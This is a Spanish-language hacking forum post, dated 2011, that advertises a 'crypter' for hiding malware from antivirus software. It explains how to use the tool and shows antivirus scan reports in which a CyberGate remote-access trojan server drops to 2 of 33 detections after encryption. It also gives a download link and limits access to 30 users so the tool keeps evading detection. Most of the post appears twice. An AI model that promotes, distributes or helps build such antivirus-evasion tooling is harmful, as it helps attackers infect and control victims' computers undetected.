Miér Mayo 11, 2011 5:48 pm
Buenas compañeros, hoy les traigo una mod del NUEVO Crypter que hice en los últimos días... me quedó kaspersky que me ganó con su heurística y la manchita de avira a la que ya nos estamos acostumbrando
Para encriptar deben escribir la ruta del stub en el textbox de la derecha y la ruta del archivo a encriptar en el textbox de la izquierda y clickear en "Encryptar", el archivo encriptado se genera en C:\ con el nombre crypted.exe.
Si prestan atención, al encriptar el server de CyberGate 6 avs dejan de detectar creo que descubrí un nuevo método de modding, ENCRIPTAR EL CYBERGATE!!!
[+] Captura:
[+] Funcionalidad:
- Windows XP SP2 32 bits
- Windows XP SP3 32 bits
- Windows Vista 32 bits
- Windows 7 32 bits
- Windows 7 64 bits
No está testeado en windows XP SP2/3 y Vista de 64 bits pero supongo que debe funcionar.
[+] Scan stub antes:
File Info
Report date: 2011-05-11.
File name: stub_antes.exe
File size: 77824 bytes
MD5 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
SHA1 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
Detection rate: 22 out of 33
Status: INFECTED
Detections
AVG - Trojan horse Startpage.HTQ.
Acavir - Clean.
Avast 5 -Win32:VBMod [Trj].
Avast -Win32:VBMod [Trj].
Avira -TR/Dropper.Gen.
BitDefender -Clean.
VirusBuster Internet Security -Worm.P2P.Palevo!ANS6M+Byi6M.
Clam Antivirus -Clean.
COMODO Internet Security -UnclassifiedMalware@127624953.
DrWeb -Clean.
eTrust-Vet -Clean.
F-PROT Antivirus -W32/Troj_Obfusc.M.gen!Eldorado (generic, not disinfectable).
F-Secure Internet Security -Gen:Trojan.Heur.ZGY.4.
G Data -Gen:Trojan.Heur.ZGY.4 (Engine-A), Win32:VBMod [Trj] (Engine-B).
IKARUS Security-Backdoor.Win32.SdBot.
Kaspersky Antivirus -P2P-Worm.Win32.Palevo.yup.
McAfee -Generic.dx!wba.
MS Security Essentials -Trojan:Win32/Dynamer!dtc.
ESET NOD32 -Trojan.Win32/Injector.BUZ.
Norman -W32/Suspicious_Gen2.HUXGY.
Norton -Trojan.Gen.2.
Panda Security -Malware.
A-Squared Security -Backdoor.Win32.SdBot!IK.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Mal/Generic-L.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -infected Trojan.VBO.012818.
Vexira Antivirus -Worm.P2P.Palevo!ANS6M+Byi6M.
Webroot Internet Security -Virus: Mal/Generic-L.
Zoner AntiVirus -Clean.
AhnLab V3 Internet Security -Clean.
Scan report generated by
[Tienes que estar registrado y conectado para ver este vínculo]
[+] Scan CyberGate antes:
File Info
Report date: 2011-05-11.
File name: CyberGate_antes.exe
File size: 381588 bytes
MD5 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
SHA1 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
Detection rate: 16 out of 33
Status: INFECTED
Detections
AVG - Trojan horse Startpage.HTQ.
Acavir - Clean.
Avast 5 -Win32:VBMod [Trj].
Avast -Win32:VBMod [Trj].
Avira -TR/Dropper.Gen.
BitDefender -Clean.
VirusBuster Internet Security -Worm.P2P.Palevo!ANS6M+Byi6M.
Clam Antivirus -Clean.
COMODO Internet Security -Clean.
DrWeb -Clean.
eTrust-Vet -Clean.
F-PROT Antivirus -W32/Troj_Obfusc.M.gen!Eldorado (generic, not disinfectable).
F-Secure Internet Security -Gen:Trojan.Heur.ZGY.4.
G Data -Gen:Trojan.Heur.ZGY.4 (Engine-A), Win32:VBMod [Trj] (Engine-B).
IKARUS Security-Backdoor.Win32.SdBot.
Kaspersky Antivirus -P2P-Worm.Win32.Palevo.yup.
McAfee -Clean.
MS Security Essentials -Trojan:Win32/Dynamer!dtc.
ESET NOD32 -Trojan.Win32/Injector.BUZ.
Norman -Clean.
Norton -Clean.
Panda Security -Malware.
A-Squared Security -Backdoor.Win32.SdBot!IK.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Clean.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -infected Trojan.VBO.012818.
Vexira Antivirus -Worm.P2P.Palevo!ANS6M+Byi6M.
Webroot Internet Security -Clean.
Zoner AntiVirus -Clean.
AhnLab V3 Internet Security -Clean.
Scan report generated by
[Tienes que estar registrado y conectado para ver este vínculo]
[+] Scan stub después:
File Info
Report date: 2011-05-11.
File name: stub_despu_eacute_s.exe
File size: 77824 bytes
MD5 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
SHA1 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
Detection rate: 2 out of 33
Status: INFECTED
Detections
AVG - Clean.
Acavir - Clean.
Avast 5 -Clean.
Avast -Clean.
Avira -TR/Dropper.Gen.
BitDefender -Clean.
VirusBuster Internet Security -Clean.
Clam Antivirus -Clean.
COMODO Internet Security -Clean.
DrWeb -Clean.
eTrust-Vet -Clean.
F-PROT Antivirus -Clean.
F-Secure Internet Security -Clean.
G Data -Clean.
IKARUS Security-Clean.
Kaspersky Antivirus -HEUR:Trojan.Win32.Generic.
McAfee -Clean.
MS Security Essentials -Clean.
ESET NOD32 -Clean.
Norman -Clean.
Norton -Clean.
Panda Security -Clean.
A-Squared Security -Clean.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Clean.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -Clean.
Vexira Antivirus -Clean.
Webroot Internet Security -Clean.
Zoner AntiVirus -Clean.
AhnLab V3 Internet Security -Clean.
Scan report generated by
[Tienes que estar registrado y conectado para ver este vínculo]
[+] Scan CyberGate después:
File Info
Report date: 2011-05-11.
File name: CyberGate_despu_eacute_s.exe
File size: 381588 bytes
MD5 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
SHA1 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
Detection rate: 2 out of 33
Status: INFECTED
Detections
AVG - Clean.
Acavir - Clean.
Avast 5 -Clean.
Avast -Clean.
Avira -TR/Dropper.Gen.
BitDefender -Clean.
VirusBuster Internet Security -Clean.
Clam Antivirus -Clean.
COMODO Internet Security -Clean.
DrWeb -Clean.
eTrust-Vet -Clean.
F-PROT Antivirus -Clean.
F-Secure Internet Security -Clean.
G Data -Clean.
IKARUS Security-Clean.
Kaspersky Antivirus -HEUR:Trojan.Win32.Generic.
McAfee -Clean.
MS Security Essentials -Clean.
ESET NOD32 -Clean.
Norman -Clean.
Norton -Clean.
Panda Security -Clean.
A-Squared Security -Clean.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Clean.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -Clean.
Vexira Antivirus -Clean.
Webroot Internet Security -Clean.
Zoner AntiVirus -Clean.
AhnLab V3 Internet Security -Clean.
Scan report generated by
[Tienes que estar registrado y conectado para ver este vínculo]
Mi próximo crypter va a tener el mismo mínimo de mensajes y luego veré si lo mantengo o lo subo, aprovechen
Algo importante es que este crypter sólo se lo voy a pasar a 30 users para que quienes obtengan la pass puedan disfrutarlo sin que se queme durante algún tiempo. Si son fieles al foro tendrán beneficios
Demás está decir que a quien se lo sorprenda pasando la pass a otros users se le vendrá la noche
Para encriptar deben escribir la ruta del stub en el textbox de la derecha y la ruta del archivo a encriptar en el textbox de la izquierda y clickear en "Encryptar", el archivo encriptado se genera en C:\ con el nombre crypted.exe.
Si prestan atención, al encriptar el server de CyberGate 6 avs dejan de detectar creo que descubrí un nuevo método de modding, ENCRIPTAR EL CYBERGATE!!!
[+] Captura:
[+] Funcionalidad:
- Windows XP SP2 32 bits
- Windows XP SP3 32 bits
- Windows Vista 32 bits
- Windows 7 32 bits
- Windows 7 64 bits
No está testeado en windows XP SP2/3 y Vista de 64 bits pero supongo que debe funcionar.
[+] Scan stub antes:
File Info
Report date: 2011-05-11.
File name: stub_antes.exe
File size: 77824 bytes
MD5 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
SHA1 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
Detection rate: 22 out of 33
Status: INFECTED
Detections
AVG - Trojan horse Startpage.HTQ.
Acavir - Clean.
Avast 5 -Win32:VBMod [Trj].
Avast -Win32:VBMod [Trj].
Avira -TR/Dropper.Gen.
BitDefender -Clean.
VirusBuster Internet Security -Worm.P2P.Palevo!ANS6M+Byi6M.
Clam Antivirus -Clean.
COMODO Internet Security -UnclassifiedMalware@127624953.
DrWeb -Clean.
eTrust-Vet -Clean.
F-PROT Antivirus -W32/Troj_Obfusc.M.gen!Eldorado (generic, not disinfectable).
F-Secure Internet Security -Gen:Trojan.Heur.ZGY.4.
G Data -Gen:Trojan.Heur.ZGY.4 (Engine-A), Win32:VBMod [Trj] (Engine-B).
IKARUS Security-Backdoor.Win32.SdBot.
Kaspersky Antivirus -P2P-Worm.Win32.Palevo.yup.
McAfee -Generic.dx!wba.
MS Security Essentials -Trojan:Win32/Dynamer!dtc.
ESET NOD32 -Trojan.Win32/Injector.BUZ.
Norman -W32/Suspicious_Gen2.HUXGY.
Norton -Trojan.Gen.2.
Panda Security -Malware.
A-Squared Security -Backdoor.Win32.SdBot!IK.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Mal/Generic-L.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -infected Trojan.VBO.012818.
Vexira Antivirus -Worm.P2P.Palevo!ANS6M+Byi6M.
Webroot Internet Security -Virus: Mal/Generic-L.
Zoner AntiVirus -Clean.
AhnLab V3 Internet Security -Clean.
Scan report generated by
[Tienes que estar registrado y conectado para ver este vínculo]
[+] Scan CyberGate antes:
File Info
Report date: 2011-05-11.
File name: CyberGate_antes.exe
File size: 381588 bytes
MD5 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
SHA1 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
Detection rate: 16 out of 33
Status: INFECTED
Detections
AVG - Trojan horse Startpage.HTQ.
Acavir - Clean.
Avast 5 -Win32:VBMod [Trj].
Avast -Win32:VBMod [Trj].
Avira -TR/Dropper.Gen.
BitDefender -Clean.
VirusBuster Internet Security -Worm.P2P.Palevo!ANS6M+Byi6M.
Clam Antivirus -Clean.
COMODO Internet Security -Clean.
DrWeb -Clean.
eTrust-Vet -Clean.
F-PROT Antivirus -W32/Troj_Obfusc.M.gen!Eldorado (generic, not disinfectable).
F-Secure Internet Security -Gen:Trojan.Heur.ZGY.4.
G Data -Gen:Trojan.Heur.ZGY.4 (Engine-A), Win32:VBMod [Trj] (Engine-B).
IKARUS Security-Backdoor.Win32.SdBot.
Kaspersky Antivirus -P2P-Worm.Win32.Palevo.yup.
McAfee -Clean.
MS Security Essentials -Trojan:Win32/Dynamer!dtc.
ESET NOD32 -Trojan.Win32/Injector.BUZ.
Norman -Clean.
Norton -Clean.
Panda Security -Malware.
A-Squared Security -Backdoor.Win32.SdBot!IK.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Clean.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -infected Trojan.VBO.012818.
Vexira Antivirus -Worm.P2P.Palevo!ANS6M+Byi6M.
Webroot Internet Security -Clean.
Zoner AntiVirus -Clean.
AhnLab V3 Internet Security -Clean.
Scan report generated by
[Tienes que estar registrado y conectado para ver este vínculo]
[+] Scan stub después:
File Info
Report date: 2011-05-11.
File name: stub_despu_eacute_s.exe
File size: 77824 bytes
MD5 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
SHA1 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
Detection rate: 2 out of 33
Status: INFECTED
Detections
AVG - Clean.
Acavir - Clean.
Avast 5 -Clean.
Avast -Clean.
Avira -TR/Dropper.Gen.
BitDefender -Clean.
VirusBuster Internet Security -Clean.
Clam Antivirus -Clean.
COMODO Internet Security -Clean.
DrWeb -Clean.
eTrust-Vet -Clean.
F-PROT Antivirus -Clean.
F-Secure Internet Security -Clean.
G Data -Clean.
IKARUS Security-Clean.
Kaspersky Antivirus -HEUR:Trojan.Win32.Generic.
McAfee -Clean.
MS Security Essentials -Clean.
ESET NOD32 -Clean.
Norman -Clean.
Norton -Clean.
Panda Security -Clean.
A-Squared Security -Clean.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Clean.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -Clean.
Vexira Antivirus -Clean.
Webroot Internet Security -Clean.
Zoner AntiVirus -Clean.
AhnLab V3 Internet Security -Clean.
Scan report generated by
[Tienes que estar registrado y conectado para ver este vínculo]
[+] Scan CyberGate después:
File Info
Report date: 2011-05-11.
File name: CyberGate_despu_eacute_s.exe
File size: 381588 bytes
MD5 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
SHA1 Hash: XXXXXXXXXXXXXXXXXXXXXXXXXX
Detection rate: 2 out of 33
Status: INFECTED
Detections
AVG - Clean.
Acavir - Clean.
Avast 5 -Clean.
Avast -Clean.
Avira -TR/Dropper.Gen.
BitDefender -Clean.
VirusBuster Internet Security -Clean.
Clam Antivirus -Clean.
COMODO Internet Security -Clean.
DrWeb -Clean.
eTrust-Vet -Clean.
F-PROT Antivirus -Clean.
F-Secure Internet Security -Clean.
G Data -Clean.
IKARUS Security-Clean.
Kaspersky Antivirus -HEUR:Trojan.Win32.Generic.
McAfee -Clean.
MS Security Essentials -Clean.
ESET NOD32 -Clean.
Norman -Clean.
Norton -Clean.
Panda Security -Clean.
A-Squared Security -Clean.
Quick Heal Antivirus -Clean.
Rising Antivirus -Clean.
Solo Antivirus -Clean.
Sophos -Clean.
Trend Micro Internet Security -Clean.
VBA32 Antivirus -Clean.
Vexira Antivirus -Clean.
Webroot Internet Security -Clean.
Zoner AntiVirus -Clean.
AhnLab V3 Internet Security -Clean.
Scan report generated by
[Tienes que estar registrado y conectado para ver este vínculo]
Link de descarga:
- Código:
http://www.multiupload.com/HNGD0P0KWR
Mi próximo crypter va a tener el mismo mínimo de mensajes y luego veré si lo mantengo o lo subo, aprovechen
Algo importante es que este crypter sólo se lo voy a pasar a 30 users para que quienes obtengan la pass puedan disfrutarlo sin que se queme durante algún tiempo. Si son fieles al foro tendrán beneficios
Demás está decir que a quien se lo sorprenda pasando la pass a otros users se le vendrá la noche